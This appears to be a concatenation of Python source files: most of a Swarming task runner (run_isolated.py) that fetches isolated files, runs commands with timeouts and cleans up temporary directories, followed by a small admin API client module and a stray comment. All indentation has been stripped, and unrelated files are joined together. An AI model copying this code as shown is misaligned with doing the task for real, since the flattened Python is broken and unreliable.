file. All content written to this directory will be uploaded upon termination
and the .isolated file describing this directory will be printed to stdout.
Any ${SWARMING_BOT_FILE} on the command line will be replaced by the value of
the --bot-file parameter. This file is used by a swarming bot to communicate
state of the host to tasks. It is written to by the swarming bot's
on_before_task() hook in the swarming server's custom bot_config.py.
"""
__version__ = '0.9.1'
import argparse
import base64
import collections
import contextlib
import json
import logging
import optparse
import os
import sys
import tempfile
import time
from third_party.depot_tools import fix_encoding
from utils import file_path
from utils import fs
from utils import large
from utils import logging_utils
from utils import on_error
from utils import subprocess42
from utils import tools
from utils import zip_package
import auth
import cipd
import isolateserver
import named_cache
# Absolute path to this file (can be None if running from zip on Mac).
THIS_FILE_PATH = os.path.abspath(
__file__.decode(sys.getfilesystemencoding())) if __file__ else None
# Directory that contains this file (might be inside zip package).
BASE_DIR = os.path.dirname(THIS_FILE_PATH) if __file__.decode(
sys.getfilesystemencoding()) else None
# Directory that contains currently running script file.
if zip_package.get_main_script_path():
MAIN_DIR = os.path.dirname(
os.path.abspath(zip_package.get_main_script_path()))
else:
# This happens when 'import run_isolated' is executed at the python
# interactive prompt, in that case __file__ is undefined.
MAIN_DIR = None
# Magic variables that can be found in the isolate task command line.
ISOLATED_OUTDIR_PARAMETER = '${ISOLATED_OUTDIR}'
EXECUTABLE_SUFFIX_PARAMETER = '${EXECUTABLE_SUFFIX}'
SWARMING_BOT_FILE_PARAMETER = '${SWARMING_BOT_FILE}'
# The name of the log file to use.
RUN_ISOLATED_LOG_FILE = 'run_isolated.log'
# The name of the log to use for the run_test_cases.py command
RUN_TEST_CASES_LOG = 'run_test_cases.log'
# Use short names for temporary directories. This is driven by Windows, which
# imposes a relatively short maximum path length of 260 characters, often
# referred to as MAX_PATH. It is relatively easy to create files with longer
# path length. A use case is with recursive depedency treesV like npm packages.
#
# It is recommended to start the script with a `root_dir` as short as
# possible.
# - ir stands for isolated_run
# - io stands for isolated_out
# - it stands for isolated_tmp
ISOLATED_RUN_DIR = u'ir'
ISOLATED_OUT_DIR = u'io'
ISOLATED_TMP_DIR = u'it'
OUTLIVING_ZOMBIE_MSG = """\
*** Swarming tried multiple times to delete the %s directory and failed ***
*** Hard failing the task ***
Swarming detected that your testing script ran an executable, which may have
started a child executable, and the main script returned early, leaving the
children executables playing around unguided.
You don't want to leave children processes outliving the task on the Swarming
bot, do you? The Swarming bot doesn't.
How to fix?
- For any process that starts children processes, make sure all children
processes terminated properly before each parent process exits. This is
especially important in very deep process trees.
- This must be done properly both in normal successful task and in case of
task failure. Cleanup is very important.
- The Swarming bot sends a SIGTERM in case of timeout.
- You have %s seconds to comply after the signal was sent to the process
before the process is forcibly killed.
- To achieve not leaking children processes in case of signals on timeout, you
MUST handle signals in each executable / python script and propagate them to
children processes.
- When your test script (python or binary) receives a signal like SIGTERM or
CTRL_BREAK_EVENT on Windows), send it to all children processes and wait for
them to terminate before quitting.
See
https://github.com/luci/luci-py/blob/master/appengine/swarming/doc/Bot.md#graceful-termination-aka-the-sigterm-and-sigkill-dance
for more information.
*** May the SIGKILL force be with you ***
"""
def get_as_zip_package(executable=True):
"""Returns ZipPackage with this module and all its dependencies.
If |executable| is True will store run_isolated.py as __main__.py so that
zip package is directly executable be python.
"""
# Building a zip package when running from another zip package is
# unsupported and probably unneeded.
assert not zip_package.is_zipped_module(sys.modules[__name__])
assert THIS_FILE_PATH
assert BASE_DIR
package = zip_package.ZipPackage(root=BASE_DIR)
package.add_python_file(THIS_FILE_PATH, '__main__.py' if executable else None)
package.add_python_file(os.path.join(BASE_DIR, 'isolate_storage.py'))
package.add_python_file(os.path.join(BASE_DIR, 'isolated_format.py'))
package.add_python_file(os.path.join(BASE_DIR, 'isolateserver.py'))
package.add_python_file(os.path.join(BASE_DIR, 'auth.py'))
package.add_python_file(os.path.join(BASE_DIR, 'cipd.py'))
package.add_python_file(os.path.join(BASE_DIR, 'named_cache.py'))
package.add_directory(os.path.join(BASE_DIR, 'libs'))
package.add_directory(os.path.join(BASE_DIR, 'third_party'))
package.add_directory(os.path.join(BASE_DIR, 'utils'))
return package
def make_temp_dir(prefix, root_dir):
"""Returns a new unique temporary directory."""
return unicode(tempfile.mkdtemp(prefix=prefix, dir=root_dir))
def change_tree_read_only(rootdir, read_only):
"""Changes the tree read-only bits according to the read_only specification.
The flag can be 0, 1 or 2, which will affect the possibility to modify files
and create or delete files.
"""
if read_only == 2:
# Files and directories (except on Windows) are marked read only. This
# inhibits modifying, creating or deleting files in the test directory,
# except on Windows where creating and deleting files is still possible.
file_path.make_tree_read_only(rootdir)
elif read_only == 1:
# Files are marked read only but not the directories. This inhibits
# modifying files but creating or deleting files is still possible.
file_path.make_tree_files_read_only(rootdir)
elif read_only in (0, None):
# Anything can be modified.
# TODO(maruel): This is currently dangerous as long as DiskCache.touch()
# is not yet changed to verify the hash of the content of the files it is
# looking at, so that if a test modifies an input file, the file must be
# deleted.
file_path.make_tree_writeable(rootdir)
else:
raise ValueError(
'change_tree_read_only(%s, %s): Unknown flag %s' %
(rootdir, read_only, read_only))
def process_command(command, out_dir, bot_file):
"""Replaces variables in a command line.
Raises:
ValueError if a parameter is requested in |command| but its value is not
provided.
"""
def fix(arg):
arg = arg.replace(EXECUTABLE_SUFFIX_PARAMETER, cipd.EXECUTABLE_SUFFIX)
replace_slash = False
if ISOLATED_OUTDIR_PARAMETER in arg:
if not out_dir:
raise ValueError(
'output directory is requested in command, but not provided; '
'please specify one')
arg = arg.replace(ISOLATED_OUTDIR_PARAMETER, out_dir)
replace_slash = True
if SWARMING_BOT_FILE_PARAMETER in arg:
if bot_file:
arg = arg.replace(SWARMING_BOT_FILE_PARAMETER, bot_file)
replace_slash = True
else:
logging.warning('SWARMING_BOT_FILE_PARAMETER found in command, but no '
'bot_file specified. Leaving parameter unchanged.')
if replace_slash:
# Replace slashes only if parameters are present
# because of arguments like '${ISOLATED_OUTDIR}/foo/bar'
arg = arg.replace('/', os.sep)
return arg
return [fix(arg) for arg in command]
def get_command_env(tmp_dir, cipd_info):
"""Returns full OS environment to run a command in.
Sets up TEMP, puts directory with cipd binary in front of PATH, and exposes
CIPD_CACHE_DIR env var.
Args:
tmp_dir: temp directory.
cipd_info: CipdInfo object is cipd client is used, None if not.
"""
def to_fs_enc(s):
if isinstance(s, str):
return s
return s.encode(sys.getfilesystemencoding())
env = os.environ.copy()
# TMPDIR is specified as the POSIX standard envvar for the temp directory.
# * mktemp on linux respects $TMPDIR, not $TMP
# * mktemp on OS X SOMETIMES respects $TMPDIR
# * chromium's base utils respects $TMPDIR on linux, $TEMP on windows.
# Unfortunately at the time of writing it completely ignores all envvars
# on OS X.
# * python respects TMPDIR, TEMP, and TMP (regardless of platform)
# * golang respects TMPDIR on linux+mac, TEMP on windows.
key = {'win32': 'TEMP'}.get(sys.platform, 'TMPDIR')
env[key] = to_fs_enc(tmp_dir)
if cipd_info:
bin_dir = os.path.dirname(cipd_info.client.binary_path)
env['PATH'] = '%s%s%s' % (to_fs_enc(bin_dir), os.pathsep, env['PATH'])
env['CIPD_CACHE_DIR'] = to_fs_enc(cipd_info.cache_dir)
return env
def run_command(command, cwd, env, hard_timeout, grace_period):
"""Runs the command.
Returns:
tuple(process exit code, bool if had a hard timeout)
"""
logging.info('run_command(%s, %s)' % (command, cwd))
exit_code = None
had_hard_timeout = False
with tools.Profiler('RunTest'):
proc = None
had_signal = []
try:
# TODO(maruel): This code is imperfect. It doesn't handle well signals
# during the download phase and there's short windows were things can go
# wrong.
def handler(signum, _frame):
if proc and not had_signal:
logging.info('Received signal %d', signum)
had_signal.append(True)
raise subprocess42.TimeoutExpired(command, None)
proc = subprocess42.Popen(command, cwd=cwd, env=env, detached=True)
with subprocess42.set_signal_handler(subprocess42.STOP_SIGNALS, handler):
try:
exit_code = proc.wait(hard_timeout or None)
except subprocess42.TimeoutExpired:
if not had_signal:
logging.warning('Hard timeout')
had_hard_timeout = True
logging.warning('Sending SIGTERM')
proc.terminate()
# Ignore signals in grace period. Forcibly give the grace period to the
# child process.
if exit_code is None:
ignore = lambda *_: None
with subprocess42.set_signal_handler(subprocess42.STOP_SIGNALS, ignore):
try:
exit_code = proc.wait(grace_period or None)
except subprocess42.TimeoutExpired:
# Now kill for real. The user can distinguish between the
# following states:
# - signal but process exited within grace period,
# hard_timed_out will be set but the process exit code will be
# script provided.
# - processed exited late, exit code will be -9 on posix.
logging.warning('Grace exhausted; sending SIGKILL')
proc.kill()
logging.info('Waiting for proces exit')
exit_code = proc.wait()
except OSError:
# This is not considered to be an internal error. The executable simply
# does not exit.
sys.stderr.write(
'<The executable does not exist or a dependent library is missing>\n'
'<Check for missing .so/.dll in the .isolate or GN file>\n'
'<Command: %s>\n' % command)
if os.environ.get('SWARMING_TASK_ID'):
# Give an additional hint when running as a swarming task.
sys.stderr.write(
'<See the task\'s page for commands to help diagnose this issue '
'by reproducing the task locally>\n')
exit_code = 1
logging.info(
'Command finished with exit code %d (%s)',
exit_code, hex(0xffffffff & exit_code))
return exit_code, had_hard_timeout
def fetch_and_map(isolated_hash, storage, cache, outdir, use_symlinks):
"""Fetches an isolated tree, create the tree and returns (bundle, stats)."""
start = time.time()
bundle = isolateserver.fetch_isolated(
isolated_hash=isolated_hash,
storage=storage,
cache=cache,
outdir=outdir,
use_symlinks=use_symlinks)
return bundle, {
'duration': time.time() - start,
'initial_number_items': cache.initial_number_items,
'initial_size': cache.initial_size,
'items_cold': base64.b64encode(large.pack(sorted(cache.added))),
'items_hot': base64.b64encode(
large.pack(sorted(set(cache.used) - set(cache.added)))),
}
def link_outputs_to_outdir(run_dir, out_dir, outputs):
"""Links any named outputs to out_dir so they can be uploaded.
Raises an error if the file already exists in that directory.
"""
if not outputs:
return
isolateserver.create_directories(out_dir, outputs)
for o in outputs:
try:
infile = os.path.join(run_dir, o)
outfile = os.path.join(out_dir, o)
if fs.islink(infile):
# TODO(aludwin): handle directories
fs.copy2(infile, outfile)
else:
file_path.link_file(outfile, infile, file_path.HARDLINK_WITH_FALLBACK)
except OSError as e:
logging.info("Couldn't collect output file %s: %s", o, e)
def delete_and_upload(storage, out_dir, leak_temp_dir):
"""Deletes the temporary run directory and uploads results back.
Returns:
tuple(outputs_ref, success, stats)
- outputs_ref: a dict referring to the results archived back to the isolated
server, if applicable.
- success: False if something occurred that means that the task must
forcibly be considered a failure, e.g. zombie processes were left
behind.
- stats: uploading stats.
"""
# Upload out_dir and generate a .isolated file out of this directory. It is
# only done if files were written in the directory.
outputs_ref = None
cold = []
hot = []
start = time.time()
if fs.isdir(out_dir) and fs.listdir(out_dir):
with tools.Profiler('ArchiveOutput'):
try:
results, f_cold, f_hot = isolateserver.archive_files_to_storage(
storage, [out_dir], None)
outputs_ref = {
'isolated': results[0][0],
'isolatedserver': storage.location,
'namespace': storage.namespace,
}
cold = sorted(i.size for i in f_cold)
hot = sorted(i.size for i in f_hot)
except isolateserver.Aborted:
# This happens when a signal SIGTERM was received while uploading data.
# There is 2 causes:
# - The task was too slow and was about to be killed anyway due to
# exceeding the hard timeout.
# - The amount of data uploaded back is very large and took too much
# time to archive.
sys.stderr.write('Received SIGTERM while uploading')
# Re-raise, so it will be treated as an internal failure.
raise
success = False
try:
if (not leak_temp_dir and fs.isdir(out_dir) and
not file_path.rmtree(out_dir)):
logging.error('Had difficulties removing out_dir %s', out_dir)
else:
success = True
except OSError as e:
# When this happens, it means there's a process error.
logging.exception('Had difficulties removing out_dir %s: %s', out_dir, e)
stats = {
'duration': time.time() - start,
'items_cold': base64.b64encode(large.pack(cold)),
'items_hot': base64.b64encode(large.pack(hot)),
}
return outputs_ref, success, stats
def map_and_run(
command, isolated_hash, storage, isolate_cache, outputs,
install_named_caches, leak_temp_dir, root_dir, hard_timeout, grace_period,
bot_file, install_packages_fn, use_symlinks, constant_run_path):
"""Runs a command with optional isolated input/output.
See run_tha_test for argument documentation.
Returns metadata about the result.
"""
assert isinstance(command, list), command
assert root_dir or root_dir is None
result = {
'duration': None,
'exit_code': None,
'had_hard_timeout': False,
'internal_failure': None,
'stats': {
# 'isolated': {
# 'cipd': {
# 'duration': 0.,
# 'get_client_duration': 0.,
# },
# 'download': {
# 'duration': 0.,
# 'initial_number_items': 0,
# 'initial_size': 0,
# 'items_cold': '<large.pack()>',
# 'items_hot': '<large.pack()>',
# },
# 'upload': {
# 'duration': 0.,
# 'items_cold': '<large.pack()>',
# 'items_hot': '<large.pack()>',
# },
# },
},
# 'cipd_pins': {
# 'packages': [
# {'package_name': ..., 'version': ..., 'path': ...},
# ...
# ],
# 'client_package': {'package_name': ..., 'version': ...},
# },
'outputs_ref': None,
'version': 5,
}
if root_dir:
file_path.ensure_tree(root_dir, 0700)
elif isolate_cache.cache_dir:
root_dir = os.path.dirname(isolate_cache.cache_dir)
# See comment for these constants.
# If root_dir is not specified, it is not constant.
# TODO(maruel): This is not obvious. Change this to become an error once we
# make the constant_run_path an exposed flag.
if constant_run_path and root_dir:
run_dir = os.path.join(root_dir, ISOLATED_RUN_DIR)
if os.path.isdir(run_dir):
file_path.rmtree(run_dir)
os.mkdir(run_dir)
else:
run_dir = make_temp_dir(ISOLATED_RUN_DIR, root_dir)
# storage should be normally set but don't crash if it is not. This can happen
# as Swarming task can run without an isolate server.
out_dir = make_temp_dir(ISOLATED_OUT_DIR, root_dir) if storage else None
tmp_dir = make_temp_dir(ISOLATED_TMP_DIR, root_dir)
cwd = run_dir
try:
with install_packages_fn(run_dir) as cipd_info:
if cipd_info:
result['stats']['cipd'] = cipd_info.stats
result['cipd_pins'] = cipd_info.pins
if isolated_hash:
isolated_stats = result['stats'].setdefault('isolated', {})
bundle, isolated_stats['download'] = fetch_and_map(
isolated_hash=isolated_hash,
storage=storage,
cache=isolate_cache,
outdir=run_dir,
use_symlinks=use_symlinks)
change_tree_read_only(run_dir, bundle.read_only)
cwd = os.path.normpath(os.path.join(cwd, bundle.relative_cwd))
# Inject the command
if bundle.command:
command = bundle.command + command
if not command:
# Handle this as a task failure, not an internal failure.
sys.stderr.write(
'<No command was specified!>\n'
'<Please secify a command when triggering your Swarming task>\n')
result['exit_code'] = 1
return result
# If we have an explicit list of files to return, make sure their
# directories exist now.
if storage and outputs:
isolateserver.create_directories(run_dir, outputs)
command = tools.fix_python_path(command)
command = process_command(command, out_dir, bot_file)
file_path.ensure_command_has_abs_path(command, cwd)
with install_named_caches(run_dir):
sys.stdout.flush()
start = time.time()
try:
result['exit_code'], result['had_hard_timeout'] = run_command(
command, cwd, get_command_env(tmp_dir, cipd_info),
hard_timeout, grace_period)
finally:
result['duration'] = max(time.time() - start, 0)
except Exception as e:
# An internal error occurred. Report accordingly so the swarming task will
# be retried automatically.
logging.exception('internal failure: %s', e)
result['internal_failure'] = str(e)
on_error.report(None)
# Clean up
finally:
try:
# Try to link files to the output directory, if specified.
if out_dir:
link_outputs_to_outdir(run_dir, out_dir, outputs)
success = False
if leak_temp_dir:
success = True
logging.warning(
'Deliberately leaking %s for later examination', run_dir)
else:
# On Windows rmtree(run_dir) call above has a synchronization effect: it
# finishes only when all task child processes terminate (since a running
# process locks *.exe file). Examine out_dir only after that call
# completes (since child processes may write to out_dir too and we need
# to wait for them to finish).
if fs.isdir(run_dir):
try:
success = file_path.rmtree(run_dir)
except OSError as e:
logging.error('Failure with %s', e)
success = False
if not success:
sys.stderr.write(OUTLIVING_ZOMBIE_MSG % ('run', grace_period))
if result['exit_code'] == 0:
result['exit_code'] = 1
if fs.isdir(tmp_dir):
try:
success = file_path.rmtree(tmp_dir)
except OSError as e:
logging.error('Failure with %s', e)
success = False
if not success:
sys.stderr.write(OUTLIVING_ZOMBIE_MSG % ('temp', grace_period))
if result['exit_code'] == 0:
result['exit_code'] = 1
# This deletes out_dir if leak_temp_dir is not set.
if out_dir:
isolated_stats = result['stats'].setdefault('isolated', {})
result['outputs_ref'], success, isolated_stats['upload'] = (
delete_and_upload(storage, out_dir, leak_temp_dir))
if not success and result['exit_code'] == 0:
result['exit_code'] = 1
except Exception as e:
# Swallow any exception in the main finally clause.
if out_dir:
logging.exception('Leaking out_dir %s: %s', out_dir, e)
result['internal_failure'] = str(e)
return result
def run_tha_test(
command, isolated_hash, storage, isolate_cache, outputs,
install_named_caches, leak_temp_dir, result_json, root_dir, hard_timeout,
grace_period, bot_file, install_packages_fn, use_symlinks):
"""Runs an executable and records execution metadata.
Either command or isolated_hash must be specified.
If isolated_hash is specified, downloads the dependencies in the cache,
hardlinks them into a temporary directory and runs the command specified in
the .isolated.
A temporary directory is created to hold the output files. The content inside
this directory will be uploaded back to |storage| packaged as a .isolated
file.
Arguments:
command: a list of string; the command to run OR optional arguments to add
to the command stated in the .isolated file if a command was
specified.
isolated_hash: the SHA-1 of the .isolated file that must be retrieved to
recreate the tree of files to run the target executable.
The command specified in the .isolated is executed.
Mutually exclusive with command argument.
storage: an isolateserver.Storage object to retrieve remote objects. This
object has a reference to an isolateserver.StorageApi, which does
the actual I/O.
isolate_cache: an isolateserver.LocalCache to keep from retrieving the
same objects constantly by caching the objects retrieved.
Can be on-disk or in-memory.
install_named_caches: a function (run_dir) => context manager that installs
named caches into |run_dir|.
leak_temp_dir: if true, the temporary directory will be deliberately leaked
for later examination.
result_json: file path to dump result metadata into. If set, the process
exit code is always 0 unless an internal error occurred.
root_dir: path to the directory to use to create the temporary directory. If
not specified, a random temporary directory is created.
hard_timeout: kills the process if it lasts more than this amount of
seconds.
grace_period: number of seconds to wait between SIGTERM and SIGKILL.
install_packages_fn: context manager dir => CipdInfo, see
install_client_and_packages.
use_symlinks: create tree with symlinks instead of hardlinks.
Returns:
Process exit code that should be used.
"""
if result_json:
# Write a json output file right away in case we get killed.
result = {
'exit_code': None,
'had_hard_timeout': False,
'internal_failure': 'Was terminated before completion',
'outputs_ref': None,
'version': 5,
}
tools.write_json(result_json, result, dense=True)
# run_isolated exit code. Depends on if result_json is used or not.
result = map_and_run(
command, isolated_hash, storage, isolate_cache, outputs,
install_named_caches, leak_temp_dir, root_dir, hard_timeout, grace_period,
bot_file, install_packages_fn, use_symlinks, True)
logging.info('Result:\n%s', tools.format_json(result, dense=True))
if result_json:
# We've found tests to delete 'work' when quitting, causing an exception
# here. Try to recreate the directory if necessary.
file_path.ensure_tree(os.path.dirname(result_json))
tools.write_json(result_json, result, dense=True)
# Only return 1 if there was an internal error.
return int(bool(result['internal_failure']))
# Marshall into old-style inline output.
if result['outputs_ref']:
data = {
'hash': result['outputs_ref']['isolated'],
'namespace': result['outputs_ref']['namespace'],
'storage': result['outputs_ref']['isolatedserver'],
}
sys.stdout.flush()
print(
'[run_isolated_out_hack]%s[/run_isolated_out_hack]' %
tools.format_json(data, dense=True))
sys.stdout.flush()
return result['exit_code'] or int(bool(result['internal_failure']))
# Yielded by 'install_client_and_packages'.
CipdInfo = collections.namedtuple('CipdInfo', [
'client', # cipd.CipdClient object
'cache_dir', # absolute path to bot-global cipd tag and instance cache
'stats', # dict with stats to return to the server
'pins', # dict with installed cipd pins to return to the server
])
@contextlib.contextmanager
def noop_install_packages(_run_dir):
"""Placeholder for 'install_client_and_packages' if cipd is disabled."""
yield None
def _install_packages(run_dir, cipd_cache_dir, client, packages, timeout):
"""Calls 'cipd ensure' for packages.
Args:
run_dir (str): root of installation.
cipd_cache_dir (str): the directory to use for the cipd package cache.
client (CipdClient): the cipd client to use
packages: packages to install, list [(path, package_name, version), ...].
timeout: max duration in seconds that this function can take.
Returns: list of pinned packages. Looks like [
{
'path': 'subdirectory',
'package_name': 'resolved/package/name',
'version': 'deadbeef...',
},
...
]
"""
package_pins = [None]*len(packages)
def insert_pin(path, name, version, idx):
package_pins[idx] = {
'package_name': name,
# swarming deals with 'root' as '.'
'path': path or '.',
'version': version,
}
by_path = collections.defaultdict(list)
for i, (path, name, version) in enumerate(packages):
# cipd deals with 'root' as ''
if path == '.':
path = ''
by_path[path].append((name, version, i))
pins = client.ensure(
run_dir,
{
subdir: [(name, vers) for name, vers, _ in pkgs]
for subdir, pkgs in by_path.iteritems()
},
cache_dir=cipd_cache_dir,
timeout=timeout,
)
for subdir, pin_list in sorted(pins.iteritems()):
this_subdir = by_path[subdir]
for i, (name, version) in enumerate(pin_list):
insert_pin(subdir, name, version, this_subdir[i][2])
assert None not in package_pins
return package_pins
@contextlib.contextmanager
def install_client_and_packages(
run_dir, packages, service_url, client_package_name,
client_version, cache_dir, timeout=None):
"""Bootstraps CIPD client and installs CIPD packages.
Yields CipdClient, stats, client info and pins (as single CipdInfo object).
Pins and the CIPD client info are in the form of:
[
{
"path": path, "package_name": package_name, "version": version,
},
...
]
(the CIPD client info is a single dictionary instead of a list)
such that they correspond 1:1 to all input package arguments from the command
line. These dictionaries make their all the way back to swarming, where they
become the arguments of CipdPackage.
If 'packages' list is empty, will bootstrap CIPD client, but won't install
any packages.
The bootstrapped client (regardless whether 'packages' list is empty or not),
will be made available to the task via $PATH.
Args:
run_dir (str): root of installation.
packages: packages to install, list [(path, package_name, version), ...].
service_url (str): CIPD server url, e.g.
"https://chrome-infra-packages.appspot.com."
client_package_name (str): CIPD package name of CIPD client.
client_version (str): Version of CIPD client.
cache_dir (str): where to keep cache of cipd clients, packages and tags.
timeout: max duration in seconds that this function can take.
"""
assert cache_dir
timeoutfn = tools.sliding_timeout(timeout)
start = time.time()
cache_dir = os.path.abspath(cache_dir)
cipd_cache_dir = os.path.join(cache_dir, 'cache') # tag and instance caches
run_dir = os.path.abspath(run_dir)
packages = packages or []
get_client_start = time.time()
client_manager = cipd.get_client(
service_url, client_package_name, client_version, cache_dir,
timeout=timeoutfn())
with client_manager as client:
get_client_duration = time.time() - get_client_start
package_pins = []
if packages:
package_pins = _install_packages(
run_dir, cipd_cache_dir, client, packages, timeoutfn())
file_path.make_tree_files_read_only(run_dir)
total_duration = time.time() - start
logging.info(
'Installing CIPD client and packages took %d seconds', total_duration)
yield CipdInfo(
client=client,
cache_dir=cipd_cache_dir,
stats={
'duration': total_duration,
'get_client_duration': get_client_duration,
},
pins={
'client_package': {
'package_name': client.package_name,
'version': client.instance_id,
},
'packages': package_pins,
})
def clean_caches(options, isolate_cache, named_cache_manager):
"""Trims isolated and named caches.
The goal here is to coherently trim both caches, deleting older items
independent of which container they belong to.
"""
# TODO(maruel): Trim CIPD cache the same way.
total = 0
with named_cache_manager.open():
oldest_isolated = isolate_cache.get_oldest()
oldest_named = named_cache_manager.get_oldest()
trimmers = [
(
isolate_cache.trim,
isolate_cache.get_timestamp(oldest_isolated) if oldest_isolated else 0,
),
(
lambda: named_cache_manager.trim(options.min_free_space),
named_cache_manager.get_timestamp(oldest_named) if oldest_named else 0,
),
]
trimmers.sort(key=lambda (_, ts): ts)
# TODO(maruel): This is incorrect, we want to trim 'items' that are strictly
# the oldest independent of in which cache they live in. Right now, the
# cache with the oldest item pays the price.
for trim, _ in trimmers:
total += trim()
isolate_cache.cleanup()
return total
def create_option_parser():
parser = logging_utils.OptionParserWithLogging(
usage='%prog <options> [command to run or extra args]',
version=__version__,
log_file=RUN_ISOLATED_LOG_FILE)
parser.add_option(
'--clean', action='store_true',
help='Cleans the cache, trimming it necessary and remove corrupted items '
'and returns without executing anything; use with -v to know what '
'was done')
parser.add_option(
'--no-clean', action='store_true',
help='Do not clean the cache automatically on startup. This is meant for '
'bots where a separate execution with --clean was done earlier so '
'doing it again is redundant')
parser.add_option(
'--use-symlinks', action='store_true',
help='Use symlinks instead of hardlinks')
parser.add_option(
'--json',
help='dump output metadata to json file. When used, run_isolated returns '
'non-zero only on internal failure')
parser.add_option(
'--hard-timeout', type='float', help='Enforce hard timeout in execution')
parser.add_option(
'--grace-period', type='float',
help='Grace period between SIGTERM and SIGKILL')
parser.add_option(
'--bot-file',
help='Path to a file describing the state of the host. The content is '
'defined by on_before_task() in bot_config.')
parser.add_option(
'--output', action='append',
help='Specifies an output to return. If no outputs are specified, all '
'files located in $(ISOLATED_OUTDIR) will be returned; '
'otherwise, outputs in both $(ISOLATED_OUTDIR) and those '
'specified by --output option (there can be multiple) will be '
'returned. Note that if a file in OUT_DIR has the same path '
'as an --output option, the --output version will be returned.')
parser.add_option(
'-a', '--argsfile',
# This is actually handled in parse_args; it's included here purely so it
# can make it into the help text.
help='Specify a file containing a JSON array of arguments to this '
'script. If --argsfile is provided, no other argument may be '
'provided on the command line.')
data_group = optparse.OptionGroup(parser, 'Data source')
data_group.add_option(
'-s', '--isolated',
help='Hash of the .isolated to grab from the isolate server.')
isolateserver.add_isolate_server_options(data_group)
parser.add_option_group(data_group)
isolateserver.add_cache_options(parser)
cipd.add_cipd_options(parser)
named_cache.add_named_cache_options(parser)
debug_group = optparse.OptionGroup(parser, 'Debugging')
debug_group.add_option(
'--leak-temp-dir',
action='store_true',
help='Deliberately leak isolate\'s temp dir for later examination. '
'Default: %default')
debug_group.add_option(
'--root-dir', help='Use a directory instead of a random one')
parser.add_option_group(debug_group)
auth.add_auth_options(parser)
parser.set_defaults(
cache='cache',
cipd_cache='cipd_cache',
named_cache_root='named_caches')
return parser
def parse_args(args):
# Create a fake mini-parser just to get out the "-a" command. Note that
# it's not documented here; instead, it's documented in create_option_parser
# even though that parser will never actually get to parse it. This is
# because --argsfile is exclusive with all other options and arguments.
file_argparse = argparse.ArgumentParser(add_help=False)
file_argparse.add_argument('-a', '--argsfile')
(file_args, nonfile_args) = file_argparse.parse_known_args(args)
if file_args.argsfile:
if nonfile_args:
file_argparse.error('Can\'t specify --argsfile with'
'any other arguments (%s)' % nonfile_args)
try:
with open(file_args.argsfile, 'r') as f:
args = json.load(f)
except (IOError, OSError, ValueError) as e:
# We don't need to error out here - "args" is now empty,
# so the call below to parser.parse_args(args) will fail
# and print the full help text.
print >> sys.stderr, 'Couldn\'t read arguments: %s' % e
# Even if we failed to read the args, just call the normal parser now since it
# will print the correct help message.
parser = create_option_parser()
options, args = parser.parse_args(args)
return (parser, options, args)
def main(args):
(parser, options, args) = parse_args(args)
isolate_cache = isolateserver.process_cache_options(options, trim=False)
named_cache_manager = named_cache.process_named_cache_options(parser, options)
if options.clean:
if options.isolated:
parser.error('Can\'t use --isolated with --clean.')
if options.isolate_server:
parser.error('Can\'t use --isolate-server with --clean.')
if options.json:
parser.error('Can\'t use --json with --clean.')
if options.named_caches:
parser.error('Can\t use --named-cache with --clean.')
clean_caches(options, isolate_cache, named_cache_manager)
return 0
if not options.no_clean:
clean_caches(options, isolate_cache, named_cache_manager)
if not options.isolated and not args:
parser.error('--isolated or command to run is required.')
auth.process_auth_options(parser, options)
isolateserver.process_isolate_server_options(
parser, options, True, False)
if not options.isolate_server:
if options.isolated:
parser.error('--isolated requires --isolate-server')
if ISOLATED_OUTDIR_PARAMETER in args:
parser.error(
'%s in args requires --isolate-server' % ISOLATED_OUTDIR_PARAMETER)
if options.root_dir:
options.root_dir = unicode(os.path.abspath(options.root_dir))
if options.json:
options.json = unicode(os.path.abspath(options.json))
cipd.validate_cipd_options(parser, options)
install_packages_fn = noop_install_packages
if options.cipd_enabled:
install_packages_fn = lambda run_dir: install_client_and_packages(
run_dir, cipd.parse_package_args(options.cipd_packages),
options.cipd_server, options.cipd_client_package,
options.cipd_client_version, cache_dir=options.cipd_cache)
@contextlib.contextmanager
def install_named_caches(run_dir):
# WARNING: this function depends on "options" variable defined in the outer
# function.
caches = [
(os.path.join(run_dir, unicode(relpath)), name)
for name, relpath in options.named_caches
]
with named_cache_manager.open():
for path, name in caches:
named_cache_manager.install(path, name)
try:
yield
finally:
with named_cache_manager.open():
for path, name in caches:
named_cache_manager.uninstall(path, name)
try:
if options.isolate_server:
storage = isolateserver.get_storage(
options.isolate_server, options.namespace)
with storage:
# Hashing schemes used by |storage| and |isolate_cache| MUST match.
assert storage.hash_algo == isolate_cache.hash_algo
return run_tha_test(
args,
options.isolated,
storage,
isolate_cache,
options.output,
install_named_caches,
options.leak_temp_dir,
options.json, options.root_dir,
options.hard_timeout,
options.grace_period,
options.bot_file,
install_packages_fn,
options.use_symlinks)
return run_tha_test(
args,
options.isolated,
None,
isolate_cache,
options.output,
install_named_caches,
options.leak_temp_dir,
options.json,
options.root_dir,
options.hard_timeout,
options.grace_period,
options.bot_file,
install_packages_fn,
options.use_symlinks)
except (cipd.Error, named_cache.Error) as ex:
print >> sys.stderr, ex.message
return 1
if __name__ == '__main__':
subprocess42.inhibit_os_error_reporting()
# Ensure that we are always running with the correct encoding.
fix_encoding.fix_encoding()
file_path.enable_symlink()
sys.exit(main(sys.argv[1:]))
|
from adminapi import _api_settings
from adminapi.request import send_request
API_CALL_ENDPOINT = '/call'
class ApiError(Exception):
pass
class ExceptionManager(object):
def __init__(self):
self._cache = {}
def __getattr__(self, attr):
if attr == 'ApiError':
return ApiError
if attr not in self._cache:
exc = type(attr, (ApiError, ), {})
self._cache[attr] = exc
return self._cache[attr]
class FunctionGroup(object):
def __init__(self, group, auth_token, timeout):
self.group = group
self.auth_token = auth_token
self.timeout = timeout
def __getattr__(self, attr):
def _api_function(*args, **kwargs):
call = {
'group': self.group,
'name': attr,
'args': args,
'kwargs': kwargs,
}
if hasattr(self.auth_token, '__call__'):
self.auth_token = self.auth_token()
result = send_request(API_CALL_ENDPOINT, call, self.auth_token,
self.timeout)
if result['status'] == 'success':
return result['retval']
if result['status'] == 'error':
if result['type'] == 'ValueError':
exception_class = ValueError
elif result['type'] == 'TypeError':
exception_class = TypeError
else:
exception_class = getattr(
ExceptionManager(), result['type']
)
#
# Dear traceback reader,
#
# This is not the location of the exception, please read the
# exception message and figure out what's wrong with your
# code.
#
raise exception_class(result['message'])
return _api_function
def get(group):
# We allow delaying the authentication
if _api_settings['auth_token'] is None:
token = (lambda: _api_settings['auth_token'])
else:
token = _api_settings['auth_token']
return FunctionGroup(group, token, _api_settings['timeout_api'])
|
# Import packages needed:
